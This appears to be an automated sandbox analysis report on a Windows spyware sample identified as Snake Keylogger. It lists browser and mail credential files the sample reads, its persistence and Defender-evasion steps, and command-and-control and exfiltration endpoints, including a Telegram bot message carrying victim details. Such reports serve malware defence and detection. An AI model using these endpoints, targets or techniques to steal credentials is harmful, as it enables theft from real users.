                Source: Yara matchFile source: 10.2.AcEnrS.exe.4087160.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.WIpGif4IRrFfamQ.exe.4caa9e0.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 10.2.AcEnrS.exe.40cb580.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.WIpGif4IRrFfamQ.exe.4c665c0.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 10.2.AcEnrS.exe.4087160.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000E.00000002.2400557396.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.2112989268.0000000004087000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2062530842.0000000004C66000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: WIpGif4IRrFfamQ.exe PID: 6600, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: AcEnrS.exe PID: 7400, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: AcEnrS.exe PID: 7708, type: MEMORYSTR
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top SitesJump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\Jump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                Source: Yara matchFile source: 0.2.WIpGif4IRrFfamQ.exe.4caa9e0.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 14.2.AcEnrS.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.WIpGif4IRrFfamQ.exe.4c665c0.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 10.2.AcEnrS.exe.40cb580.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 10.2.AcEnrS.exe.4087160.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.WIpGif4IRrFfamQ.exe.4caa9e0.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 10.2.AcEnrS.exe.40cb580.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.WIpGif4IRrFfamQ.exe.4c665c0.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 10.2.AcEnrS.exe.4087160.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000009.00000002.4473996288.0000000002F1A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000E.00000002.2400557396.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.2112989268.0000000004087000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2062530842.0000000004C66000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: WIpGif4IRrFfamQ.exe PID: 6600, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: WIpGif4IRrFfamQ.exe PID: 7308, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: AcEnrS.exe PID: 7400, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: AcEnrS.exe PID: 7708, type: MEMORYSTR

                Remote Access Functionality

                barindex
                Source: Yara matchFile source: 00000009.00000002.4473996288.0000000002E11000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000E.00000002.2402217603.0000000002A71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0.2.WIpGif4IRrFfamQ.exe.4caa9e0.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 14.2.AcEnrS.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.WIpGif4IRrFfamQ.exe.4c665c0.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 10.2.AcEnrS.exe.40cb580.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 10.2.AcEnrS.exe.4087160.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.WIpGif4IRrFfamQ.exe.4caa9e0.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 10.2.AcEnrS.exe.40cb580.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.WIpGif4IRrFfamQ.exe.4c665c0.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 10.2.AcEnrS.exe.4087160.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000E.00000002.2400557396.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.2112989268.0000000004087000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2062530842.0000000004C66000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: WIpGif4IRrFfamQ.exe PID: 6600, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: WIpGif4IRrFfamQ.exe PID: 7308, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: AcEnrS.exe PID: 7400, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: AcEnrS.exe PID: 7708, type: MEMORYSTR
                Source: Yara matchFile source: 0.2.WIpGif4IRrFfamQ.exe.4caa9e0.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 14.2.AcEnrS.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.WIpGif4IRrFfamQ.exe.4c665c0.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 10.2.AcEnrS.exe.40cb580.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 10.2.AcEnrS.exe.4087160.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.WIpGif4IRrFfamQ.exe.4caa9e0.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 10.2.AcEnrS.exe.40cb580.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.WIpGif4IRrFfamQ.exe.4c665c0.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 10.2.AcEnrS.exe.4087160.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000E.00000002.2400557396.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.2112989268.0000000004087000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2062530842.0000000004C66000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: WIpGif4IRrFfamQ.exe PID: 6600, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: AcEnrS.exe PID: 7400, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: AcEnrS.exe PID: 7708, type: MEMORYSTR
                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
                Scheduled Task/Job
                1
                DLL Side-Loading
                1
                DLL Side-Loading
                11
                Disable or Modify Tools
                1
                OS Credential Dumping
                1
                File and Directory Discovery
                Remote Services11
                Archive Collected Data
                1
                Web Service
                Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault AccountsScheduled Task/Job1
                Scheduled Task/Job
                111
                Process Injection
                1
                Deobfuscate/Decode Files or Information
                LSASS Memory13
                System Information Discovery
                Remote Desktop Protocol1
                Data from Local System
                3
                Ingress Tool Transfer
                Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                Scheduled Task/Job
                3
                Obfuscated Files or Information
                Security Account Manager1
                Query Registry
                SMB/Windows Admin Shares1
                Email Collection
                11
                Encrypted Channel
                Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook12
                Software Packing
                NTDS111
                Security Software Discovery
                Distributed Component Object ModelInput Capture1
                Non-Standard Port
                Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                Timestomp
                LSA Secrets1
                Process Discovery
                SSHKeylogging3
                Non-Application Layer Protocol
                Scheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                DLL Side-Loading
                Cached Domain Credentials41
                Virtualization/Sandbox Evasion
                VNCGUI Input Capture24
                Application Layer Protocol
                Data Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                Masquerading
                DCSync1
                Application Window Discovery
                Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job41
                Virtualization/Sandbox Evasion
                Proc Filesystem1
                System Network Configuration Discovery
                Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt111
                Process Injection
                /etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1523246 Sample: WIpGif4IRrFfamQ.exe Startdate: 01/10/2024 Architecture: WINDOWS Score: 100 48 reallyfreegeoip.org 2->48 50 api.telegram.org 2->50 52 3 other IPs or domains 2->52 60 Found malware configuration 2->60 62 Malicious sample detected (through community Yara rule) 2->62 64 Antivirus detection for URL or domain 2->64 70 11 other signatures 2->70 8 WIpGif4IRrFfamQ.exe 7 2->8         started        12 AcEnrS.exe 5 2->12         started        signatures3 66 Tries to detect the country of the analysis system (by using the IP) 48->66 68 Uses the Telegram API (likely for C&C communication) 50->68 process4 file5 40 C:\Users\user\AppData\Roaming\AcEnrS.exe, PE32 8->40 dropped 42 C:\Users\user\...\AcEnrS.exe:Zone.Identifier, ASCII 8->42 dropped 44 C:\Users\user\AppData\Local\...\tmp5423.tmp, XML 8->44 dropped 46 C:\Users\user\...\WIpGif4IRrFfamQ.exe.log, ASCII 8->46 dropped 72 Uses schtasks.exe or at.exe to add and modify task schedules 8->72 74 Adds a directory exclusion to Windows Defender 8->74 76 Injects a PE file into a foreign processes 8->76 14 WIpGif4IRrFfamQ.exe 15 2 8->14         started        18 powershell.exe 23 8->18         started        20 powershell.exe 23 8->20         started        22 schtasks.exe 1 8->22         started        78 Multi AV Scanner detection for dropped file 12->78 80 Machine Learning detection for dropped file 12->80 24 schtasks.exe 12->24         started        26 AcEnrS.exe 12->26         started        signatures6 process7 dnsIp8 54 api.telegram.org 149.154.167.220, 443, 49744 TELEGRAMRU United Kingdom 14->54 56 mail.pymetal.net 75.102.58.14, 49745, 587 SERVERCENTRALUS United States 14->56 58 2 other IPs or domains 14->58 82 Tries to steal Mail credentials (via file / registry access) 14->82 84 Tries to harvest and steal browser information (history, passwords, etc) 14->84 86 Loading BitLocker PowerShell Module 18->86 28 conhost.exe 18->28         started        30 WmiPrvSE.exe 18->30         started        32 conhost.exe 20->32         started        34 conhost.exe 22->34         started        36 conhost.exe 24->36         started        38 WerFault.exe 26->38         started        signatures9 process10

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand
                SourceDetectionScannerLabelLink
                WIpGif4IRrFfamQ.exe47%ReversingLabsWin32.Spyware.Snakekeylogger
                WIpGif4IRrFfamQ.exe100%Joe Sandbox ML
                SourceDetectionScannerLabelLink
                C:\Users\user\AppData\Roaming\AcEnrS.exe100%Joe Sandbox ML
                C:\Users\user\AppData\Roaming\AcEnrS.exe47%ReversingLabsWin32.Spyware.Snakekeylogger
                No Antivirus matches
                No Antivirus matches
                SourceDetectionScannerLabelLink
                https://duckduckgo.com/chrome_newtab0%URL Reputationsafe
                https://duckduckgo.com/ac/?q=0%URL Reputationsafe
                https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%URL Reputationsafe
                http://checkip.dyndns.org0%URL Reputationsafe
                https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
                https://reallyfreegeoip.org/xml/8.46.123.330%URL Reputationsafe
                https://www.ecosia.org/newtab/0%URL Reputationsafe
                http://varders.kozow.com:80810%URL Reputationsafe
                http://aborters.duckdns.org:8081100%URL Reputationmalware
                https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
                http://checkip.dyndns.org/0%URL Reputationsafe
                http://51.38.247.67:8081/_send_.php?L0%URL Reputationsafe
                http://anotherarmy.dns.army:8081100%URL Reputationmalware
                http://x1.c.lencr.org/00%URL Reputationsafe
                http://x1.i.lencr.org/00%URL Reputationsafe
                https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
                http://checkip.dyndns.org/q0%URL Reputationsafe
                https://reallyfreegeoip.org0%URL Reputationsafe
                http://checkip.dyndns.com0%URL Reputationsafe
                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe
                http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded0%URL Reputationsafe
                https://reallyfreegeoip.org/xml/0%URL Reputationsafe
                NameIPActiveMaliciousAntivirus DetectionReputation
                reallyfreegeoip.org
                188.114.97.3
                truetrue
                  unknown
                  api.telegram.org
                  149.154.167.220
                  truetrue
                    unknown
                    mail.pymetal.net
                    75.102.58.14
                    truetrue
                      unknown
                      checkip.dyndns.com
                      193.122.6.168
                      truefalse
                        unknown
                        checkip.dyndns.org
                        unknown
                        unknowntrue
                          unknown
                          NameMaliciousAntivirus DetectionReputation
                          https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:065367%0D%0ADate%20and%20Time:%2002/10/2024%20/%2021:40:19%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20065367%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5Dfalse
                            unknown
                            https://reallyfreegeoip.org/xml/8.46.123.33false
                            • URL Reputation: safe
                            unknown
                            http://checkip.dyndns.org/false
                            • URL Reputation: safe
                            unknown
                            NameSourceMaliciousAntivirus DetectionReputation
                            https://www.office.com/WIpGif4IRrFfamQ.exe, 00000009.00000002.4473996288.0000000003002000.00000004.00000800.00020000.00000000.sdmpfalse
                              unknown
                              https://duckduckgo.com/chrome_newtabWIpGif4IRrFfamQ.exe, 00000009.00000002.4477766999.0000000003E31000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              unknown
                              https://duckduckgo.com/ac/?q=WIpGif4IRrFfamQ.exe, 00000009.00000002.4477766999.0000000003E31000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              unknown
                              https://api.telegram.orgWIpGif4IRrFfamQ.exe, 00000009.00000002.4473996288.0000000002EF9000.00000004.00000800.00020000.00000000.sdmpfalse
                                unknown
                                https://www.google.com/images/branding/product/ico/googleg_lodp.icoWIpGif4IRrFfamQ.exe, 00000009.00000002.4477766999.0000000003E31000.00000004.00000800.00020000.00000000.sdmpfalse
                                  unknown
                                  https://api.telegram.org/botWIpGif4IRrFfamQ.exe, 00000000.00000002.2062530842.0000000004C66000.00000004.00000800.00020000.00000000.sdmp, WIpGif4IRrFfamQ.exe, 00000009.00000002.4473996288.0000000002EF9000.00000004.00000800.00020000.00000000.sdmp, AcEnrS.exe, 0000000A.00000002.2112989268.0000000004087000.00000004.00000800.00020000.00000000.sdmp, AcEnrS.exe, 0000000E.00000002.2400557396.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                                    unknown
                                    https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:065367%0D%0ADate%20aWIpGif4IRrFfamQ.exe, 00000009.00000002.4473996288.0000000002EF9000.00000004.00000800.00020000.00000000.sdmpfalse
                                      unknown
                                      https://www.office.com/lBWIpGif4IRrFfamQ.exe, 00000009.00000002.4473996288.0000000002FFD000.00000004.00000800.00020000.00000000.sdmpfalse
                                        unknown
                                        https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=WIpGif4IRrFfamQ.exe, 00000009.00000002.4477766999.0000000003E31000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        unknown
                                        http://r10.o.lencr.org0#WIpGif4IRrFfamQ.exe, 00000009.00000002.4480635628.00000000066B0000.00000004.00000020.00020000.00000000.sdmp, WIpGif4IRrFfamQ.exe, 00000009.00000002.4471835088.00000000010B5000.00000004.00000020.00020000.00000000.sdmp, WIpGif4IRrFfamQ.exe, 00000009.00000002.4473996288.0000000002F4B000.00000004.00000800.00020000.00000000.sdmp, WIpGif4IRrFfamQ.exe, 00000009.00000002.4469911274.0000000000FF6000.00000004.00000020.00020000.00000000.sdmpfalse
                                          unknown
                                          http://checkip.dyndns.orgWIpGif4IRrFfamQ.exe, 00000009.00000002.4473996288.0000000002E11000.00000004.00000800.00020000.00000000.sdmp, AcEnrS.exe, 0000000E.00000002.2402217603.0000000002B2D000.00000004.00000800.00020000.00000000.sdmp, AcEnrS.exe, 0000000E.00000002.2402217603.0000000002B3A000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          unknown
                                          https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=WIpGif4IRrFfamQ.exe, 00000009.00000002.4477766999.0000000003E31000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          unknown
                                          https://api.telegram.org/bot/sendMessage?chat_id=&text=WIpGif4IRrFfamQ.exe, 00000009.00000002.4473996288.0000000002EF9000.00000004.00000800.00020000.00000000.sdmpfalse
                                            unknown
                                            https://chrome.google.com/webstore?hl=enWIpGif4IRrFfamQ.exe, 00000009.00000002.4473996288.0000000002FD1000.00000004.00000800.00020000.00000000.sdmp, WIpGif4IRrFfamQ.exe, 00000009.00000002.4473996288.0000000003002000.00000004.00000800.00020000.00000000.sdmpfalse
                                              unknown
                                              https://www.ecosia.org/newtab/WIpGif4IRrFfamQ.exe, 00000009.00000002.4477766999.0000000003E31000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              unknown
                                              https://chrome.google.com/webstore?hl=enxWIpGif4IRrFfamQ.exe, 00000009.00000002.4473996288.0000000002FC2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                unknown
                                                http://varders.kozow.com:8081WIpGif4IRrFfamQ.exe, 00000000.00000002.2062530842.0000000004C66000.00000004.00000800.00020000.00000000.sdmp, WIpGif4IRrFfamQ.exe, 00000009.00000002.4473996288.0000000002E11000.00000004.00000800.00020000.00000000.sdmp, AcEnrS.exe, 0000000A.00000002.2112989268.0000000004087000.00000004.00000800.00020000.00000000.sdmp, AcEnrS.exe, 0000000E.00000002.2400557396.0000000000402000.00000040.00000400.00020000.00000000.sdmp, AcEnrS.exe, 0000000E.00000002.2402217603.0000000002A71000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                unknown
                                                http://mail.pymetal.netWIpGif4IRrFfamQ.exe, 00000009.00000002.4473996288.0000000002F4B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  unknown
                                                  http://aborters.duckdns.org:8081WIpGif4IRrFfamQ.exe, 00000000.00000002.2062530842.0000000004C66000.00000004.00000800.00020000.00000000.sdmp, WIpGif4IRrFfamQ.exe, 00000009.00000002.4473996288.0000000002E11000.00000004.00000800.00020000.00000000.sdmp, AcEnrS.exe, 0000000A.00000002.2112989268.0000000004087000.00000004.00000800.00020000.00000000.sdmp, AcEnrS.exe, 0000000E.00000002.2400557396.0000000000402000.00000040.00000400.00020000.00000000.sdmp, AcEnrS.exe, 0000000E.00000002.2402217603.0000000002A71000.00000004.00000800.00020000.00000000.sdmptrue
                                                  • URL Reputation: malware
                                                  unknown
                                                  https://ac.ecosia.org/autocomplete?q=WIpGif4IRrFfamQ.exe, 00000009.00000002.4477766999.0000000003E31000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  unknown
                                                  https://www.office.com/xWIpGif4IRrFfamQ.exe, 00000009.00000002.4473996288.0000000002FF3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    unknown
                                                    http://51.38.247.67:8081/_send_.php?LWIpGif4IRrFfamQ.exe, 00000009.00000002.4473996288.0000000002F4B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    unknown
                                                    https://reallyfreegeoip.org/xml/8.46.123.33$WIpGif4IRrFfamQ.exe, 00000009.00000002.4473996288.0000000002E8C000.00000004.00000800.00020000.00000000.sdmp, WIpGif4IRrFfamQ.exe, 00000009.00000002.4473996288.0000000002ED2000.00000004.00000800.00020000.00000000.sdmp, WIpGif4IRrFfamQ.exe, 00000009.00000002.4473996288.0000000002EF9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      unknown
                                                      http://anotherarmy.dns.army:8081WIpGif4IRrFfamQ.exe, 00000000.00000002.2062530842.0000000004C66000.00000004.00000800.00020000.00000000.sdmp, WIpGif4IRrFfamQ.exe, 00000009.00000002.4473996288.0000000002E11000.00000004.00000800.00020000.00000000.sdmp, AcEnrS.exe, 0000000A.00000002.2112989268.0000000004087000.00000004.00000800.00020000.00000000.sdmp, AcEnrS.exe, 0000000E.00000002.2400557396.0000000000402000.00000040.00000400.00020000.00000000.sdmp, AcEnrS.exe, 0000000E.00000002.2402217603.0000000002A71000.00000004.00000800.00020000.00000000.sdmptrue
                                                      • URL Reputation: malware
                                                      unknown
                                                      http://x1.c.lencr.org/0WIpGif4IRrFfamQ.exe, 00000009.00000002.4480635628.00000000066B0000.00000004.00000020.00020000.00000000.sdmp, WIpGif4IRrFfamQ.exe, 00000009.00000002.4471835088.00000000010B5000.00000004.00000020.00020000.00000000.sdmp, WIpGif4IRrFfamQ.exe, 00000009.00000002.4473996288.0000000002F4B000.00000004.00000800.00020000.00000000.sdmp, WIpGif4IRrFfamQ.exe, 00000009.00000002.4469911274.0000000000FF6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      unknown
                                                      http://x1.i.lencr.org/0WIpGif4IRrFfamQ.exe, 00000009.00000002.4480635628.00000000066B0000.00000004.00000020.00020000.00000000.sdmp, WIpGif4IRrFfamQ.exe, 00000009.00000002.4471835088.00000000010B5000.00000004.00000020.00020000.00000000.sdmp, WIpGif4IRrFfamQ.exe, 00000009.00000002.4473996288.0000000002F4B000.00000004.00000800.00020000.00000000.sdmp, WIpGif4IRrFfamQ.exe, 00000009.00000002.4469911274.0000000000FF6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      unknown
                                                      https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchWIpGif4IRrFfamQ.exe, 00000009.00000002.4477766999.0000000003E31000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      unknown
                                                      http://checkip.dyndns.org/qWIpGif4IRrFfamQ.exe, 00000000.00000002.2062530842.0000000004C66000.00000004.00000800.00020000.00000000.sdmp, AcEnrS.exe, 0000000A.00000002.2112989268.0000000004087000.00000004.00000800.00020000.00000000.sdmp, AcEnrS.exe, 0000000E.00000002.2400557396.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      unknown
                                                      https://chrome.google.com/webstore?hl=enlBWIpGif4IRrFfamQ.exe, 00000009.00000002.4473996288.0000000002FCC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        unknown
                                                        https://reallyfreegeoip.orgWIpGif4IRrFfamQ.exe, 00000009.00000002.4473996288.0000000002E62000.00000004.00000800.00020000.00000000.sdmp, WIpGif4IRrFfamQ.exe, 00000009.00000002.4473996288.0000000002ED2000.00000004.00000800.00020000.00000000.sdmp, WIpGif4IRrFfamQ.exe, 00000009.00000002.4473996288.0000000002EF9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        • URL Reputation: safe
                                                        unknown
                                                        http://checkip.dyndns.comAcEnrS.exe, 0000000E.00000002.2402217603.0000000002B3A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        • URL Reputation: safe
                                                        unknown
                                                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameWIpGif4IRrFfamQ.exe, 00000000.00000002.2061901731.00000000032E1000.00000004.00000800.00020000.00000000.sdmp, WIpGif4IRrFfamQ.exe, 00000009.00000002.4473996288.0000000002E11000.00000004.00000800.00020000.00000000.sdmp, AcEnrS.exe, 0000000A.00000002.2111265878.0000000002701000.00000004.00000800.00020000.00000000.sdmp, AcEnrS.exe, 0000000E.00000002.2402217603.0000000002A71000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        • URL Reputation: safe
                                                        unknown
                                                        https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=WIpGif4IRrFfamQ.exe, 00000009.00000002.4477766999.0000000003E31000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        • URL Reputation: safe
                                                        unknown
                                                        http://r10.i.lencr.org/0WIpGif4IRrFfamQ.exe, 00000009.00000002.4480635628.00000000066B0000.00000004.00000020.00020000.00000000.sdmp, WIpGif4IRrFfamQ.exe, 00000009.00000002.4471835088.00000000010B5000.00000004.00000020.00020000.00000000.sdmp, WIpGif4IRrFfamQ.exe, 00000009.00000002.4473996288.0000000002F4B000.00000004.00000800.00020000.00000000.sdmp, WIpGif4IRrFfamQ.exe, 00000009.00000002.4469911274.0000000000FF6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          unknown
                                                          http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencodedWIpGif4IRrFfamQ.exe, 00000000.00000002.2062530842.0000000004C66000.00000004.00000800.00020000.00000000.sdmp, AcEnrS.exe, 0000000A.00000002.2112989268.0000000004087000.00000004.00000800.00020000.00000000.sdmp, AcEnrS.exe, 0000000E.00000002.2400557396.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                                                          • URL Reputation: safe
                                                          unknown
                                                          https://reallyfreegeoip.org/xml/WIpGif4IRrFfamQ.exe, 00000000.00000002.2062530842.0000000004C66000.00000004.00000800.00020000.00000000.sdmp, WIpGif4IRrFfamQ.exe, 00000009.00000002.4473996288.0000000002E62000.00000004.00000800.00020000.00000000.sdmp, AcEnrS.exe, 0000000A.00000002.2112989268.0000000004087000.00000004.00000800.00020000.00000000.sdmp, AcEnrS.exe, 0000000E.00000002.2400557396.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                                                          • URL Reputation: safe
                                                          unknown
                                                          • No. of IPs < 25%
                                                          • 25% < No. of IPs < 50%
                                                          • 50% < No. of IPs < 75%
                                                          • 75% < No. of IPs
                                                          IPDomainCountryFlagASNASN NameMalicious
                                                          75.102.58.14
                                                          mail.pymetal.netUnited States
                                                          23352SERVERCENTRALUStrue
                                                          149.154.167.220
                                                          api.telegram.orgUnited Kingdom
                                                          62041TELEGRAMRUtrue
                                                          188.114.97.3
                                                          reallyfreegeoip.orgEuropean Union
                                                          13335CLOUDFLARENETUStrue
                                                          193.122.6.168
                                                          checkip.dyndns.comUnited States
                                                          31898ORACLE-BMC-31898USfalse
                                                          Joe Sandbox version:41.0.0 Charoite
